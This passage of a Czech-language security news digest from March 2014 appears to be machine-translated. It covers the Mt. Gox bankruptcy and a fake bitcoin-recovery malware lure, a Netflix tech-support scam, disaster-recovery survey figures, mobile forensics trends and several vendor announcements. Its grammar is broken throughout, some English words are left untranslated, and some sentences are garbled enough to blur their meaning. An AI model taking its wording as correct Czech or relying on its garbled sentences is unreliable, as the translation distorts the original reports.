také záměrně uchovává soukromý klíč uživatele, název místnosti, nick, kamarádi, a další identifikační údaje v konfiguračním souboru, "dodal. "To vše může být použita k vaší identifikaci, past konferenční místnosti, a další informace, které by mohly vystavit. A bohužel, když jsem se to mohlo přijít jen pár minut, jsem si jistý, že ti špatní / federálové / etc. Jsou přijít na to taky. To lze obnovit forenzně od většiny komerčních forenzních nástrojů na zařízení jakéhokoli modelu.


73% firem jsou připraveni pro obnovu po havárii
10.3.2014 Bezpečnost

Disaster Recovery připravenost (DRP) Rada oznámila poznatky z jeho srovnávací studie, které ukazují, že 73% dotazovaných organizací po celém světě nejsou přijaly přiměřená opatření na ochranu svých dat a IT systémů. Špatné plánování, testování a technologické nedostatky vedly k více než $ 5M stojí za kritických aplikací selhání, datových center výpadky a ztráty dat. Studie dotázaných více než 1000 organizací, od malých firem až po velké podniky, aby jim pomohla srovnávací připravenost pro obnovu kritických IT systémů ve virtuálních prostředích. Klíčová zjištění patří:

64% respondentů průzkumu tvrdí, že zotavení po havárii (DR), rozpočet organizace jejich hry je neadekvátní a nedostatečně.
Více než 60% uvádí, že nemají plně dokumentovaný plán obnovy po havárii, a mezi menšinu, která dělá, 23% respondentů nikdy testovány těchto plánů.
Přibližně jedna třetina říká, že testovat svůj plán jen jednou nebo dvakrát za rok, a více než 65% z těchto organizací neprojdou vlastní DR testy.
78% respondentů zažilo výpadky kritických aplikací, a této skupiny, 63% tvrdí, že ztráty se pohybovaly od několika tisíc dolarů na více než $ 5M.
Z respondentů, kteří zažili výpadky, přibližně 28% tvrdí, že jejich organizace ztrátě funkčnosti datových center až několik týdnů.
Většina respondentů dotazovaných na vědomí jejich nedostatek v oblasti připravenosti na katastrofy, a uvádí, že jejich organizace je nyní plánuje nebo pozmění své implementační strategii. Některé organizace již podnikla kroky ke zlepšení jejich připravenosti na katastrofy, které používají osvědčené praktiky, které zahrnují:
Budování komplexní DR plán na zotavení aplikace, sítě a služby pro obchodníky, včetně primární a sekundární servery.
Definování času zotavení cílů (RTOS) a cíle bod obnovení (RPOS) pro kritické aplikace na stanovených správné očekávání a předpoklady pro řízení a zaměstnance.
Automatizace časté testování obnovy kritických aplikací ověřit své schopnosti obnovy v rámci stanovených výzkumné organizace / RPOS.


Mt. GOX uživatelé cílených s falešnými sliby ztracené Bitcoin zotavení
9.3.2014 Kriminalita
Bitcoin výměnu Mt. Gox je sdíleno podrobnosti o otázky, které k němu vedly podání návrh na konkurz ochranu , stejně jako malware trhovců začali využívat zoufalství postižené uživatele "a touha obnovit své ztracené bitcoins. burza zveřejnila oznámení regarding konkurzní aplikace s Tokio okresní soud, ve kterém je vysvětleno, že jeho závazky převyšují jeho majetek, a že tato situace může být spojena se ztrátou bitcoins a prostředků klientů:

Na začátku února 2014 nezákonný přístup přes zneužití chyby v Bitcoin systému vedla k nárůstu neúplných přenosu Bitcoin transakcí a my jsme zjistili, že existuje možnost, že bitcoins byl nezákonně prošel zneužití této chyby. Jak Výsledkem našeho vnitřního vyšetřování, jsme zjistili, že velké množství bitcoins zmizel. Ačkoli kompletní rozsah není dosud znám, jsme zjistili, že asi 750.000 bitcoins uložené uživateli a přibližně 100.000 bitcoins patří nám zmizel. Jsme přesvědčeni, že je vysoká pravděpodobnost, že tyto bitcoins byly ukradeny v důsledku zneužití této chyby a jsme požádali odborníka se podívat na možnosti trestního oznámení a provádět správné postupy. Téhož dne (24.), jsme zjistili velké rozdíly mezi množstvím peněžních prostředků ve finančních institucích a vložené částky od našich uživatelů. Částky jsou stále v šetření a mohou se lišit, ale přiblížit 2,8 miliardy JPY. jsme se zjistit příčiny těchto problémů. Vzhledem k tomu, tam jsou asi různé příčiny včetně hackingu třetími stranami, musíme prozkoumat obrovské množství hlášení o transakcích s cílem zjistit pravdu. K tomuto datu, nemůžeme potvrdit přesné množství chybějících vkladů finančních prostředků a celkovou výši bitcoins, které zmizely. Poté, co jsme zjistili, že bitcoins zmizel a rozdíly mezi v peněžních prostředcích a zůstatky, usoudili jsme, že by bylo obtížné, aby i nadále naše aktivity normálně a proto uzavřen na našich stránkách v poledne na 25. (Japonsko času).
 

Jsou také použity pro povolení k "obnově" Mt. GOX "pod dohledem soudu v právně organizované řízení," aby mohli splatit dluhy postižených uživatelů, kteří jsou vyzváni, aby se obraťte na nově zřízené call centra, pokud máte jakékoliv dotazy. Do té doby, podvody nabízí naději o vrácení ukradených bitcoins, ale dodávající malware se objevily. Malwarebytes 'Chris Boyd varuje o takový podvod, který vybízí uživatelům sledovat video, které zřejmě vysvětluje, že "Mt. GOX vrátí všechny ztracené Bitcoins." Ale, jsou vyzváni, ke stažení Adobe Flash Player, aby byli schopni se dívat na to.
 

Naneštěstí pro ně, nabídl software je škodlivý spustitelný zabalený v rar souboru.. Povaha malwaru v otázce je stále neznámý, ale tam moci být žádná pochybnost, že to přinese jen smutek se již ubohých uživatelů.


Cyber ​​podvodníci půjde po lékařských záznamů další
9.3.2014 Hrozby
Jako bezpečnostní firmy a orgány činné v trestním řízení nadále spolupracovat a úspěšně sundat botnety, bude počítačoví podvodníci budou nuceni hledat nové a lukrativní cílů, a to zejména ty, které jsou špatně zajištěné.

V panelu se konala na konferenci RSA která se konala minulý týden v San Franciscu, tým Microsoft / Agari za Citadely botnet takedown řekl, že tyto nové cíle bude pravděpodobně ve zdravotnictví. Poté vysvětluje , jak šli kolem provádějící takedown, ale vysvětlil důvod své přesvědčení, že zdravotní systémy IT a nemocniční databáze jsou další v řadě k porušení dat. generální ředitel Agari Patrick Peterson sdíleny, že cena lékařských záznamů, které patří do jedné osobě by mohlo přinést asi 60 dolarů, zatímco jeden záznam kreditní kartou se vyplatí pár dolarů v podzemních trzích. On také poukázal na to, že mezi odvětví tak daleko, finančních organizací a sociálních sítí zaměřených tvrdě pracovali na ochranu svých zákazníků, a dělali pokusy počítačoví zločinci "složitější, a proto dražší. Na Na druhé straně, většina zdravotnického průmyslu není následovali. Navíc k tomu všemu, lékařské záznamy, aby podvodníci velmi cenné informace o cíli, které mohou být zneužity k montáži účinných útoků sociálního inženýrství, poznamenal Richard Boscovich, asistentka generální rada s Microsoft Digital Zločiny jednotka. Dalo by se věřit, že informace, jako je ta obsažená v lékařských záznamů by mohlo být, že užitečné, ale v rukou kvalifikovaných sociálních inženýrů se může obrátit na zlato. "Tihle kluci jsou dobří, jsme viděli, že se stalo," komentoval Boscovich.


Uživatelé Netflix cílené na aktivní technickou podporu podvod
9.3.2014 Kriminalita | Incidenty
Bezpečnostní výzkumník Malwarebytes 'Jerome Segura nedávno analyzoval spíše tvůrčí technickou podporu podvod, který se aktivně zaměřenou na uživatele Netflix. Neříká, jak se potenciální cíle lákal na falešnou Netflix přihlašovací stránku, která je prvním krokem k podvést, ale je to velmi pravděpodobné, že obdrží falešné Netflix e-mail je varování, že jejich účet byl napaden. Jakmile předložit své přihlašovací údaje na falešné přihlašovací stránky, které se potýkají s upozorněním, říká jejich účet byl pozastaven a nutit je, aby volání na konkrétní daň bez telefonní číslo: "Když jsem volal na číslo, rogue podpora zástupce se mě stáhnout" Netflix podpůrného softwaru "," Segura sdílel jeho dobrodružství s podvodníky. software v otázce je TeamViewer, populární program pro vzdálené přihlašování, že podvodníci poté použít k připojení k cílovému PC. Scammer snažil se ho přesvědčit, že jeho účet Netflix byla pozastavena z důvodu nezákonné činnosti, že jeho počítač byl hacknutý, a že by se nechal Microsoft Certified Technician opravit svůj počítač - a zaplatit téměř 400 dolarů za službu. "Během našeho rozhovoru, že podvodníci nejsou nečinné," poznamenal. "Oni šli přes mé osobní soubory a nahrát ty, které vypadalo zajímavé pro ně, jako" bankovní 2013.doc '. " "Další zvláštní věc je, když mě požádal o obrázku ID a fotografie z mé kreditní karty od Internetu .. není bezpečné, a oni potřebovali důkaz mé identity jsem nemohl vyrobit jeden, proto se aktivuje svou webovou kameru, takže jsem mohl ukázat, že karty, které jim na jejich obrazovce " Jeho analýza říká, že podvod je nový a stále pokračuje - doména oni používali byl zaregistrován a nedávno aktualizován - tak varuje uživatele, aby byl opatrný. V tomto konkrétním podvod, mohli by přijít o všechno:. Peníze, důvěrné soubory, a osobní a informace o účtu Pokud chcete vidět a slyšet, jak celý scamming proces rozvíjí.


Cisco nabízí 300k $ bezpečnostních řešení internetu věcí
9.3.2014 Bezpečnost
Cisco uvedla na trh novou soutěž a volá na "vizionářů, inovátorů a realizátorů" navrhnout praktická řešení pro otázky, které ovlivňují bezpečnost internetu věcí.

"Jsme propojení více našeho světa každý den přes inteligentní, IP-umožnil zařízení od domácích spotřebičů, zdravotnických zařízení a průmyslových zařízení. Tyto nové připojená zařízení, které nabízejí nové způsoby, jak sdílet informace, a mění způsob, jakým žijeme," říká Christopher Young, senior viceprezident pro skupinu zabezpečení společnosti Cisco. "Přesto, jak naše životy spojené růst a stát bohatší, potřeba nového bezpečnostního modelu stává ještě kritičtější. To vyžaduje, aby pracujeme společně jako komunita najít inovativní řešení Ujistěte se, že internet věcí bezpečně plní svůj potenciál a zachovává pohodlí, že to představuje. " Young oznámila Challenge minulý týden ve svém proslovu na konferenci RSA , a nabídl více informací na blogu . Internet věcí Security Grand se Challenge má cenu pot ve výši $ 300,000 - maximálně 6 výherců obdrží ceny od $ 50,000 k 75,000 dolar. Také dobré vědět, že všichni účastníci budou mít příležitost k další spolupráci s Cisco mimo tuto výzvu. proveditelnosti návrhů ", škálovatelnost, výkon a snadné použití bude posuzovat hodnotící porota složená z pěti inženýrů Cisco a vědců, včetně Dave Evans, společnosti Chief Futuristické. Lhůta pro podání nabídek je 17.června 2014 a vítězové budou vyhlášeni a jejich řešení představila na internetu věcí Světového fóra letos na podzim.


D-Link představuje přenosný 11AC router a nabíječky
9.3.2014 Hardware
D-Link oznámila, že se nyní prodává na světě první přenosné 11AC router, Wi-Fi AC750 Portable Router a nabíječka (DIR-510L). Tento nejnovější přírůstek do rodiny D-Link o řešení konektivity umožňuje mobilním uživatelům rychle a snadno vytvořit Wi-Fi hotspot z existujícího připojení k internetu, ať už je to 3G/4G, Wi-Fi nebo Ethernet, zatímco on-the-go. Přenosný Wi-Fi Router je také vybaven vysokokapacitní dobíjecí baterie 4000 mAh, který dokáže nabíjení mobilních zařízení. Navíc se zdarma mydlink SharePort mobilní aplikace, mohou uživatelé nahrávat, stahovat a streamovat multimédia a dokumenty na paměťovou jednotku připojenou k jednomu ze dvou portů USB přenosný routeru z libovolného místa na světě. Začlenění nejnovější technologií Wireless AC750, Wi- Fi Portable Router a nabíječka nabízí uživatelům vysokou rychlost a řadu pokročilých funkcí, zajišťující vynikající rozsah a přenos dat do a z připojených zařízení. Využití technologií duálního pásma, aby se vyhnula radio přetížení a rušení, DIR-510L lze dodat celkem 750Mbps využití kombinovaných propustnost svých 2,4 GHz a 5GHz pásma. Kromě toho, každá skupina může fungovat jako samostatná Wi-Fi sítě, poskytuje možnost přizpůsobit síť podle potřeby připojení a dokonce nakonfigurovat jako host zónu poskytnout přístup k internetu pro návštěvníky bez poskytnutí přístupu ke zbytku sítě. DIR -510L poskytuje okamžité sdílení jakéhokoliv internetového připojení s vyšší zabezpečení brány firewall při připojení k sdílené veřejné připojení, a nabízí následující vlastnosti výrobku:
 

Vysoká kapacita baterie - Vestavěná nabíjecí baterie 4000mAh udrží gadgets nabitá a připravená k použití, včetně tablet
Dva porty USB - Umožňuje současné sdílení souborů a připojení modemu 3G/4G/LTE, zapojte do 3G/4G/LTE USB modem pro sdílení připojení k Internetu nebo použít USB flash disk pro přenos obsahu na různých mobilních zařízeních
mydlink SharePort - umožňuje uživatelům streamovat obsah z připojeného USB disku na více mobilních zařízení pomocí bezplatné mobilní aplikace
Snadné nastavení - Automaticky detekuje typ připojení - broadband router, mobilní směrovač, hotspot - pro optimální rychlost a úspory, uživatelsky přívětivé rozhraní ukládá informace o připojení, které pomohou udržet všechna zařízení připojit automaticky
Universal Plug and Play (UPnP) a vestavěný DLNA Server - Streams multimediální hladce a bezpečně přes přístrojů a zařízení, včetně chytrých televizorů, herních konzolí a mediálních PC
Wi-Fi AC750 Portable Router a nabíječka (DIR-510L), je nyní k dispozici na Amazon.com, Frys.com, a celé sítě D-Link maloobchodní a e-tail prodejen za $ 99.99.


TrustyCon jednání zpřístupněny na videu
9.3.2014 Konference
Jak oznámil , TrustyCon INFOSEC konference, zřízená bezpečnostní poradenská firma ISEC Partners, Electronic Frontier Foundation (EFF) a DEF CON a koná současně jako RSA Conference USA 2014 , byl vypracován docela dav. S reproduktory, jako je F-Secure je CRO Mikko Hypponen, cryptographer a bezpečnost počítačový expert Bruce Schneier, a několik dalších INFOSEC svítidla that bojkotovali konferenci RSA probuzení veřejných obvinění, že RSA přijato 10 milionů dolarů z NSA na backdoor its Bsafe řešení konference zabývat otázkou důvěry v technologii společnosti a jejich nabídky, jakož i vlády, a jak bychom mohli udělat druhý přepínač od špehování "všichni" na špionáž zločinců. Netrvalo dlouho a organizátorů vydat video s hodnotě více než sedmi hodinách rozhovorů od událost.


Trendy tvarování mobilní forenzní v roce 2014
9.3.2014 Mobil
Mobile poskytovatelem forenzních Cellebrite zkoumal svou zákaznickou základnu a vedli rozhovory s předními mobilními znalců a analytiků zahrnující průmysl, žádá svůj názor na top trendy tvarování mobilní forenzní v letošním roce.

Podle výzkumu, můžeme očekávat následující v měsících:
Spotřebitelé stále více spoléhají na více zařízeních: Vyšetřovatelé je pravděpodobné, že se ocitnou analýzu dat z více než jednoho mobilního telefonu, tabletu, GPS zařízení a jiných mobilních médií, a to nejen na jeden případ, ale také na osobu. Jako výsledek, mobilní forenzní vyšetřování předstihl počítačové forenzní, se poměr zvyšuje až o trojnásobek v průběhu posledních tří let. "Tento trend ukazuje, že jako mobilní zařízení stávají silnější a snadnější k použití, více lidí závisí na nich řídit různé aspekty své práce a osobního života," řekla Cindy Murphy, detektiv s policejní oddělení Madison Wisconsin. "To znamená, že vyšetřovatelé potřebují způsob, jak spravovat více zdrojů dat získat ucelený obraz o životě každého člověka, v časovém rámci, který jim nejvíce provede informace."
Extrakce a analýza na místní úrovni, přesouvá z laboratoře do terénu: Vzhledem k rychlému nárůstu mobilních zařízení důkazů, mohou orgány činné v trestním řízení již spoléhat pouze na forenzní laboratoře na státní a federální úrovni. Ať už jako součást hledání incidentu zatknout, forenzní náhled digitálních médií při výkonu povolení k domovní prohlídce nebo souhlasu hledat při hodnocení stížnost, téměř 44 procent respondentů se extrahovat mobilní data v poli. "Digitální forenzní je stále demokratizovat," řekl D / Sgt Peter Salter ze služby policie Severního Irska eCrime jednotky. "Specializované odborné znalosti budou vždy důležitým strategickým prvkem v rámci celkové schopnosti produkovat solidní důkaz pro soud. Nicméně, odborníci a případové vyšetřovatelé stejně tak prospěch z mít možnost zkoumat exponáty na místě a na frontové linii. Rámci dohodnutých postupů, tento přístup umožňuje vyšetřovatelům určit, které vystavuje vyžadují hlubší šetření, jakož i poskytování přímých vyšetřovatelům s rychlým, řízený přístup k digitálním důkazů s cílem informovat své kritické rozhodování. "
Mobilní důkaz dostane sociální, datové zdroje diverzifikovat: Tam je přibližně 1,19 miliardy aktivních uživatelů na Facebooku, 300 miliard tweets odeslané na Twitteru měsíčně, a 16 miliard fotografie sdílené na Instagram měsíčně. Navíc, 2013 viděl více než 100 miliard stahování mobilních aplikací. Výsledek? Údaje žijící v sociálních aplikací se stala kriticky důležité, protože výrazně vzrostl počet vyšetřování trestných činů týkajících se data shromážděná z těchto aplikací. Průzkum Cellebrite odhalil, že 77 procent respondentů věří, že mobilní aplikace jsou nejdůležitější zdroj dat, následuje mrak na 71 procent. "Dokumentace různé komunikační kanály, které jsou součástí trestného činu (např. Facebook, YouTube, atd.), stejně jako ty, které mohou vést k novým svědků, obětí, podezřelých a alternativní pachatelů je stále důležitější," řekl John Carney, Chief Technology Officer na Carney Forenzní. "Je nutné, aby souvislostí dat mobilních zařízení se sociálními daty z on-line osobností lidí."
Big dat, zaměřené analýzy: S množstvím digitálních důkazů rostoucí z GB na TB v mnoha případech, analýzy dat se stává ještě větší význam pro pochopení mobilní důkazy. Vyšetřovatelé musí být schopen oddělit relevantní data z bezvýznamné, a pak se snadno pochopit a vysvětlit rozdíly na sebe, kolegové, advokáti / advokátů a porotci. "Schopnost vizualizovat časové osy, zeměpisných oblastí, a obsah může být právě rozdíl v tom, jak porotci, advokáty / právníci a jiní vnímají význam dat, která extrahovat," řekl Simon Lang, digitální forenzní manažer s SYTECH.
Mobilní malware dopady občanské a trestní vyšetřování: V roce 2013, odborníci z odvětví předpovídali nárůst mobilního malwaru a následnou potřebu pro forenzní zkoušející pochopit, jak rozpoznat a analyzovat ji spolu s dalšími důkazy. "Malware jako faktor podvodu, intimní partnerské zneužívání, krádež duševního vlastnictví a obchodních tajemství a jiných trestných činů, je něco, co všichni vyšetřovatelé budou muset zvážit, s každým mobilním zařízením se setkat," řekl Carlos Cajigas, školení ředitel a senior forenzní Zkoušející se Epyx Forenzní. "Jsou nezbytné pro vývoj úrovně odborné způsobilosti vyšetřovatelé třeba, aby se tato hodnocení školení a praktické zkušenosti."
"Nárůst využívání mobilních telefonů a spotřební spoléhání se na těchto zařízeních se přímo zvýšil složitost trestního vyšetřování," řekl Ron Serber, Cellebrite co-CEO. "Aby bylo zajištěno, že shromážděné mobilních dat se promítá do forenzně pádných důkazů, informovanost, vzdělávání a odborné přípravy bude mít zásadní význam pro mobilní forenzní průmyslu v letošním roce."


Rychle identifikovat a jednat v otázkách pro zabezpečení koncových bodů
8.3.2014 Zabezpečení
Promisec oznámila plány na Promisec bezúhonnost, série cloudových nabídek, které pomáhají malým až středně velké podniky se zabezpečením koncových bodů a sanace. kompletní sadu nabídky umožňuje IT organizacím zajistit soulad, bránit proti rostoucímu počtu kybernetických hrozeb ovlivňují podnikání dnes a ověřit integritu koncových bodů napříč všemi nasazeny bezpečnosti a IT konečnými technologií.

Podle nedávné zprávy společnosti Gartner, "Malware je již uvnitř vaší organizace, s tím vypořádat," publikoval 12.2.2014, "bezpečnostní organizace, musí předpokládat, že jsou ohrožena, a proto investovat do schopností detektivní, které poskytují průběžné sledování pro vzory a chování svědčící o zlý úmysl. "Za tímto účelem, říká zpráva," nová třída detekce koncového bodu a odpovědi (ETDR) prodejci se začínají zaplnit mezery, které zůstávají tradiční ochrany koncových bodů platformy (EPP) Suites. [Oni] poskytnout "ukazatele kompromisů" (IOCs) vést úsilí o odhalování a vyšetřování nástroje v reálném čase, které umožňují rychlé výslechu koncových bodů a historie koncových bodů. " Promisec Integrity poskytuje nepřetržité monitorování pro pokročilou detekci hrozeb tím vydělávat na kolektivní inteligence od stávající nástroje pro zabezpečení a správu, aby poskytují jistotu, že všechny nástroje a procesy jsou funkční, agenti jsou aktuální, a software je záplatované. . To poskytuje IT organizacím možnost zlepšit jejich dopadající dobu odezvy, a tak omezit obchodní dopad Další plánované přírůstky Promisec Integrita zahrnuje:

Endpoint kontrola - průběžné sledování služba, která bude testovat a hlásit na celý koncový bod životního prostředí odhalit jeho stav zabezpečení, včetně odhalování neoprávněných žádostí, potvrzení antivirus a řešení pro správu SCCM / oprava fungují správně, a zajistit dodržování podnikových zásad IT
Tamper detekce - validační službu souboru, který potvrdí, zda jsou soubory, nebo s ním manipulovala poškozen útokem, ať už jako se to děje, nebo po útoku
Pro řešení krizí - služba Incident Response, která bude zametat zákazníků koncové body pro konkrétní otázky-jako je konkrétní malware útoku nebo starší verzi softwaru, který je náchylný k hack-a nabídky na místě sanace a podávání zpráv o aktuálním stavu těchto koncového bodu prostředí.
"Promisec Integrity je jako tlačítko" nepanikařte ", které mohou rychle poskytnout klid mysli a postup-pro malé a středně velké podniky, které se musí dostat před nejnovějšími hrozbami ještě před jejich negativní dopad na firemní IP, operační účinnosti a, nakonec, značka důvěra a ziskovost, "řekl Dan Ross, generální ředitel, Promisec. Společnost bude odhaluje konkrétní řešení jsou k dispozici pro Promisec integritu až do konce roku 2014, začíná se schopností detekce cyber v nadcházejících týdnech.


RSA Účastníci konference ambivalentní o taktice NSA
8.3.2014 Konference
Thycotic Software oznámila výsledky průzkumu 341 RSA Conference USA 2014 účastníků, která zjistila, že méně než polovina (48%) z pollees pocit, že NSA překročil své hranice ve svém dohledu amerických občanů. Po rozsáhlé kritice agentury v hlavní projevy Tato data ukazují, že mnozí odborníci na bezpečnost v úvahu jeho činnosti nezbytné k americkému kybernetické obrany. Současně, tři čtvrtiny (75%) respondentů, bez ohledu na jejich postoj k NSA, myslím, že ti, kteří bojkotovali RSA konference v letošním roce mají právo jejich názoru, a 9% dokonce uvažuje se k nim připojili. Pouze 17% uvedlo, ti, kteří bojkotovali RSA jsou pozornost azyl. Průzkum také odhalil rozšířené přesvědčení, že zneužití privilegovaného přístupu dochází v rámci organizace úcastník. Pouze 19% respondentů věří, že takový přístup, často odkazoval se na jako "klíče království", je používán správně. . V čem může signalizovat rezignaci na tuto skutečnost, zhruba jeden z pěti (19%) RSA attendees naznačují, že by ještě najmout Edward Snowdena, dána možnost Další klíčové závěry z průzkumu patří:

Z 52% respondentů, kteří neměli naznačují, že NSA překračuje své hranice, 21% věří, že vláda musí být vědomi toho, komunikačních údajů občanů z cílem lépe chránit z teroristické činnosti, a 31% uvedlo, že jsou v rozporu o problém, a že zatímco oni mají co skrývat, jsou obavy o ztrátu soukromí.
Případně, 48% respondentů jednoznačně říci, NSA se překročit jeho hranice v jeho sledování občanů USA.
61% respondentů na vědomí, že buď věděli, že zaměstnanci v rámci jejich společnosti byly zneužívány privilegovaný přístup (24%) nebo že je pravděpodobné, že mají (37%). Dalších 20% nejste jisti, zda se to stalo.
Bohužel, průzkum neříká, zda pollees byli američtí občané nebo ne.


Rizikové Analytics jako služba Brinqa
8.3.2014 Bezpečnost
Brinqa oznámil první Risk Analytics v tomto průmyslovém odvětví jako službu nabízet. "Risk Analytics jako Service je zaměřen na firmy, které se snaží najít nákladově efektivní a účinný způsob, jak extrahovat znalosti z jejich bezpečnost a provozní údaje, které jim pomohou identitu jejich skutečný rizika a činit lepší informovaná obchodní rozhodnutí, "řekl Amad Fida, generální ředitel, Brinqa. "Naše Cloud řešení umožňuje tyto společnosti vzdát se výdaje na GRC systému šestimístný a místo toho platit za to, co oni používají se zaměřením na konkrétní sadu funkcí, které jsou nezbytné pro jejich potřeby."
Brinqa Risk Analytics jako službu nabízet je postaven na základech Brinqa Enterprise Platform. Platforma poskytuje přehled organizací do všech základních údajů a potřebné metriky aktivně kompenzovat potenciální hrozby. . Prostřednictvím kompletní automatizaci agregace dat a analýzu rizik, zkracuje dobu odezvy na nové hrozby a snižuje námahu a náklady pro organizace tím, že využije společnou platformu v rámci celého podniku Klíčové vlastnosti produktu patří:

Agregace dat ze zdrojů z Internetu pomocí zabezpečeného cloud konektor server brány
Pre-postavený a připravený k použití aplikací, jako je Application Security Risk, Service Provider rizik a technologických rizik Analytics, žádné úpravy nebo kódování požadované
Kompletní šifrování dat, data v klidu, stejně jako údaje v pohybu
Advance analytické použití algoritmů strojového učení
Pay per zpoplatnění použití
Brinqa je první, která nabízí cenově dostupné cloud-based analytický rizikové řešení, které zahrnuje kompletní automatizaci a kontinuální sledování a podávání zpráv o riziku, které mohou být použity non-Fortune 1000 společností.


Mt. Vyměňovat soubory GOX Bitcoin pro konkurzní ochrany
8.3.2014 Ochrany
Po sérii špatných zpráv z Mt. GOX je konečný úder svým uživatelům: prominentní výměna Bitcoin již podala návrh na konkurs se Tokio Okresního soudu v Japonsku. Tento krok je věřil být - alespoň částečně - reakce na úřad amerického zastupitelství v New Yorku podání obsílku proti společnost (Mt. GOX je registrován jako obchodní peníze-služeb v USA), ale to může mít také něco do činění s tím, že japonské finanční úřady, policie, ministerstvo financí a jiní jsou při pohledu na náhlé vypnutí populární Japan bázi výměny v úterý. uzavření výměny znamená, že zákazníci nemohou přistupovat své účty a stáhnout bitcoins uložené tam. Zda budou mít příležitost k tomu, aby v budoucnu se uvidí. Ve podání, Mt. GOX uvedl, že 750.000 z bitcoins svých zákazníků a 100.000 z jeho vlastní byl ztracen, která úzce koresponduje s čísly uvedených v dokumentu, který byl v oběhu na internetu za posledních pár dní. pravdivost a zdroj dokumentu je nebyly objeveny, a Mt. GOX řekl, že nebyli autoři. krádež byla zřejmě výsledkem chyby v Bitcoin software, který umožnil poškozené transakce, a jeho existence a využívání způsobilo několik Bitcoin výměnu - včetně Mt. GOX - k zastavení obchodování a výběry na začátku tohoto měsíce. Obchodování byla později obnovena, ale odstoupení nebylo možné, protože. Mt. GOX CEO Mark Karpeles, který nedávno odstoupil z rady Bitcoin nadace, se snažil ujistit uživatele, že pracují na řešení, a že je stále v Japonsku. Zákazníci jsou, pochopitelně, vztek a byly odvzdušnění i on-line a protestovali před Mt. Sídlo GOX. Bohužel, toto a jiné mimořádné události týkající se další výměny Bitcoin ukazují nevýhody digitální měny v té podobě, jak se v současné době, stejně jako použité technologie. Není pochyb o tom, že myšlenka digitální měny získal tah s uživateli internetu a investory, ale Některé změny budou muset být provedeny za to realizovat svůj plný potenciál. bude zapotřebí jasně definované zákony, politiky a mnohem větší transparentnost. Do té doby, bude počáteční obtíže pokračovat, a je třeba očekávat - ne, že to potěší Mt. Zákazníci GOX a další majitelé digitálních měn, které ji ztraceny v důsledku krádeží.


Budoucnost řízení přístupu podle HID
8.3.2014 Bezpečnost
Nové bezpečnostní prostředí, ve kterém uživatelé budou mít bezproblémovou práci při používání aplikací a cloud-based služeb, přístup k datům, a otevření dveří se objevuje. Toto prostředí se bude pohybovat průmyslu nad rámec tradičních silných autentizačních přístupů, karty a čtečky zjednodušit a zlepšit jak vytvářet, spravovat a používat identity napříč mnoha různých aplikací na obou čipových karet a smartphony.

Bude také umožní lepší účinnost prostřednictvím centralizace pověření řízením pro více kontroly logický a fyzický přístup identit napříč IT prostředků a zařízení. V bílé knize s názvem "Konvergence IT a fyzické kontroly přístupu," HID Global identifikovat klíčové události, které jsou hnací průmyslu směrem k těsnější integraci pověření řízením a více bezešvé uživatelské zkušenosti pro řízení jak logický a fyzický přístup k:

Stěhování za karty: nejen, že organizace konsolidaci aplikací na jediné pověření, které lze použít k ovládání přístupu k IT zdrojů a zařízení, které se pohybují také tato pověření multi-aplikace na chytré telefony pro lepší pohodlí. Díky tomu bude možné pro smartphony udělit přístup ke všemu, co ode dveří, aby údaje, na cloudu.
Stěhování nad čtenářů: Jak uživatelé přejít na modelu, kde se jednoduše klepněte jejich čipovou kartu nebo smartphone do osobního tabletu nebo notebooku k ověřování k síti, bude potřeba pro samostatnou čtečku karet. Uživatelé budou moci používat svůj telefon, nebo čipovou kartu "klepněte na" k VPN, bezdrátových sítí, firemní intranety, cloud-a webových aplikací, single-sign-on (SSO), klientů a dalších IT zdrojů.
Stěhování za nákladné a složité PKI řešení: Příchod obchodního Ověření identity (CIV) karty umožňuje organizacím implementovat silnou autentizaci pro přístup k datům a otevírání dveří, aniž byste museli kupovat certifikáty z trust anchor nebo zaplatit roční udržovací poplatky, jako je tomu s PKI na základě vládní Osobní Ověření identity (PIV) karty.
Přechod na skutečné řízení konvergovaných přístupu: konvergované řízení přístupu karet dnes jsou obvykle buď dual-čipových karet (kde je jeden čip používá pro PACS a jiné logický přístup), nebo dual-rozhraní čipových karet (nesoucí jeden PKI, který je schopen čip s oběma kontaktní a bezkontaktní rozhraní podporovat jak fyzické a logické řízení přístupu). V budoucnosti budou uživatelé mít třetí možnost pověření pomocí datového modelu, který může představovat jakýkoli typ informací o totožnosti, na paměťové kartě nebo uvnitř telefonu. To zahrnuje PACS pověření, jakož i OTP pro silnou autentizaci, z nichž všechny mohou být použity bez problémů na více systémových architektur. K dispozici bude jedna sada konvergovaných bezpečnostní politiky, které zahrnují jak fyzické a logické domény, jednu pověření, a jeden protokol auditu.
Kromě trendům směřujícím k nové technologie, které umožňují pohodlné a velmi bezpečné silnou autentizaci, bude tato technologie také umožňují organizacím využívat existující infrastrukturu pro správu pověření pro dosažení skutečnou konvergenci prostřednictvím jediného zařízení, které mohou být použity pro mnoho bezpečnostní aplikace. Tím se eliminuje potřebu samostatných procesů pro poskytování a zápis IT a PACS identit. Namísto toho bude možné uplatňovat jednotný soubor pracovních postupů na jedné sady spravovaných identit pro organizační sblížení.


1 ve 4 evropských uživatelů internetu zkušenosti blokování internetového obsahu
8.3.2014 Bezpečnost
. 24% evropských uživatelů internetu tvrdí, že je zabráněno jejich poskytovatelů ze sledování videa, poslech hudby nebo pomocí jiných aplikací podle vlastního výběru, podle nového průzkumu Eurobarometru z 28.000 občanů v celé EU Průzkum zjistil, že:

41% máte potíže sledování videa na mobilním zařízení a 37% na spojení v pevné Internet na doma (z důvodu omezení rychlosti nebo blokování obsahu)
23% problémů zážitek z poslechu hudby na svém mobilním zařízení,
23% Zkušenosti problémy Nahrávání obsahu na Facebooku, blogu, fóru nebo prostřednictvím svého mobilního zařízení
19% Zkušenosti problémy hraní on-line her na stole počítač,
9% máte potíže s využitím internetové dodáno telefonní hovory
To také ukazuje, že:
60% zákazníků neví, svůj internetový rychlost.
Z těch, kteří vědí, jejich rychlost, 26% tvrdí, že se jim nedostává rychlost, která odpovídá podmínky jejich smlouvy.
40% všech respondentů zažilo připojení k internetu rozebrat.
